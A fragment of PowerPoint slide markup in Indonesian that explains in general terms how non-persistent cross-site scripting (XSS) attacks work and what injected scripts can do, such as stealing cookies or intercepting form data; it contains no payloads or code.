            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web statis. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs (XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunjungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyisipkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input di situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikodekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sembarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>formulir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemalsuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Poin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
